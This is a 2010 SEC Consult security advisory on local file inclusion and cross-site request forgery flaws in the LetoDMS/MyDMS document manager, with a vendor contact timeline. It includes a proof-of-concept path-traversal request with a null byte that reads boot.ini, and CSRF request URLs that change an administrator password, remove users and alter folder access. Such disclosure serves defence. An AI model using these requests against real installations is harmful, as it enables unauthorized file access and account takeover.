SEC Consult SA-20100115-0 :: Local file inclusion/execution and multiple CSRF vulnerabilities in LetoDMS (formerly MyDMS) Jan 15 2010 02:16PM
Lukas Weichselbaum (research sec-consult com)
SEC Consult Security Advisory < 20100115-0 >

title: Local file inclusion/execution and multiple
Cross-Site-Request-Forgery vulnerabilities in
LetoDMS (formerly MyDMS)
products: LetoDMS (formerly MyDMS)
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2
fixed version: n.a.
impact: critical
homepage: http://sourceforge.net/projects/mydms/
found: 2009-10-09
by: D. Fabian / SEC Consult / www.sec-consult.com
L. Weichselbaum / SEC Consult / www.sec-consult.com

Vendor description:
MyDMS is an open-source, web-based document management system (DMS)
written in PHP with a database backend. Originally coded by Markus
Westphal, MyDMS provides document meta-data, version control, security
and easy access to your documents.

source: http://sourceforge.net/projects/mydms/

Vulnerability overview/description:
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file
inclusion. Through this vulnerability it is possible to read sensitive
data of the web server and to execute malicious PHP-code.

Furthermore there exist multiple Cross-Site-Request-Forgery
vulnerabilities which can be used to force a user/admin to execute
unwanted actions. Some of these actions are:
* Create new user with admin-privileges
* Change user credentials
* Delete a user/folder/document
* Change owner of a document
* Change access to a document
* Add keywords
* Add notifications
* Move folders

Proof of concept:
File inclusion/execution
If the guest-account is activated or you have a user to log in, it is
possible to include or execute files. The lang-parameter can be
modified in a malicious way. To terminate the predefined file-ending a
null-byte has to be appended after the file to be included. The
following GET-request can be used to e.g. receive the content of the
boot.ini-file on a server running Windows as operating system. This
vulnerability can also be used to execute malicious PHP-code (e.g.
PHP-code that has been written into log-files).

PoC request

GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../
boot.ini%00&sesstheme= HTTP/1.1

Cross-Site-Request-Forgery (CSRF)
The following requests can be used for CSRF-attacks:

- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned
&fullname=Administrator&email=address (at) server (dot) com [email concealed]&comment=&userfile=
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1
- /mydms/op/op.RemoveFolder.php?folderid=2
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1

It is assumed that there is more functionality vulnerable to

Vulnerable versions:
* <= 1.7.2

Vendor contact timeline:
2009-10-29: Contacting developers on SourceForge.Net and on
trilexnet.com by contact-form and the dev-forum.
2009-12-11: No response from developers so far.
2009-12-11: New attempt to contact developers.
2010-01-15: No response from developers.
2010-01-15: Release of the advisory.


Advisory URL:

SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

SEC Consult conducts periodical information security workshops on ISO
27001/BS 7799 in cooperation with BSI Management Systems. For more
information, please refer to https://www.sec-consult.com/academy_e.html

EOF L. Weichselbaum / @2010

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus